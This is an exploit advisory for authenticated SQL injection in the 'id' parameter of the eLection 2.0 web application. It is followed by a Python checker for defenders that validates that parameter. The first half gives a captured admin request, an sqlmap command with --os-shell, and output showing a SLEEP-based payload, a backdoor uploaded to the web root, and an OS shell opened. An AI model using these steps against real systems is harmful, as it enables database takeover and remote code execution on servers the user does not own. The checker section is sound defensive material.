# Title: eLection 2.0 - 'id' SQL Injection

The eLection Web application is vulnerable to authenticated SQL Injection which leads to remote code execution:

Login to the admin portal and browse to the candidates section. Capture the request in BurpSuite and save it to file:

```
POST /election/admin/ajax/op_kandidat.php HTTP/1.1
Referer:
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cookie: el_listing_panitia=5; el_mass_adding=false; el_listing_guru=5; el_listing_siswa=5; PHPSESSID=b4f0c3bbccd80e9d55fbe0269a29f96a; el_lang=en-us
```

Send the request to SQLMap with the following parameters:

```
sqlmap -r getcandidate --level=5 --risk=3 --os-shell -p id
```

```
Title: AND boolean-based blind - WHERE or HAVING clause
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: aksi=fetch&id=256 AND (SELECT 8551 FROM (SELECT(SLEEP(5)))nYfJ)
Title: Generic UNION query (NULL) - 5 columns

unable to automatically parse any web server path
trying to upload the file stager on '/opt/lampp/htdocs/election/' via LIMIT 'LINES TERMINATED BY' method
the file stager has been successfully uploaded on '/opt/lampp/htdocs/election/'
the backdoor has been successfully uploaded on '/opt/lampp/htdocs/election/'
calling OS shell.
```
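For defenders, the following added example (not part of the advisory or of the eLection code base) shows a strict allowlist check on the `id` parameter of POSTs to the endpoint named above, run over constructed request bodies. It assumes `id` is meant to be a small unsigned integer key; the function names `check_request` and `scan` are hypothetical.

```python
import re
from urllib.parse import parse_qs

# Endpoint path taken from the advisory's captured request.
ENDPOINT = "/election/admin/ajax/op_kandidat.php"
# Assumption: a legitimate id is a plain unsigned integer (ASCII digits only).
INT_RE = re.compile(r"[0-9]{1,10}")


def check_request(path, body):
    """Return a list of findings for one POST; an empty list means clean."""
    if path.split("?", 1)[0] != ENDPOINT:
        return []
    # parse_qs URL-decodes values, so encoded payloads are seen in clear form.
    params = parse_qs(body, keep_blank_values=True)
    ids = params.get("id", [])
    findings = []
    if len(ids) > 1:
        # Repeated parameters are a common way to confuse filters and parsers.
        findings.append("duplicate id parameter")
    for value in ids:
        if not INT_RE.fullmatch(value):
            findings.append("non-integer id: %r" % value[:80])
    return findings


# Constructed sample requests (path, form body); not captured traffic.
SAMPLES = [
    (ENDPOINT, "aksi=fetch&id=256"),
    (ENDPOINT, "aksi=fetch&id=256 AND (SELECT 8551 FROM (SELECT(SLEEP(5)))nYfJ)"),
    (ENDPOINT, "aksi=fetch&id=256%20AND%20(SELECT%208551%20FROM%20(SELECT(SLEEP(5)))nYfJ)"),
    (ENDPOINT, "aksi=fetch&id=1&id=2"),
    ("/election/index.php", "id=abc"),
]


def scan(samples):
    """Return (sample index, finding) pairs for every flagged request."""
    return [(i, f) for i, (p, b) in enumerate(samples)
            for f in check_request(p, b)]


if __name__ == "__main__":
    for index, finding in scan(SAMPLES):
        print(index, finding)
```

The same integer check belongs in the application itself, before the value reaches a parameterized query.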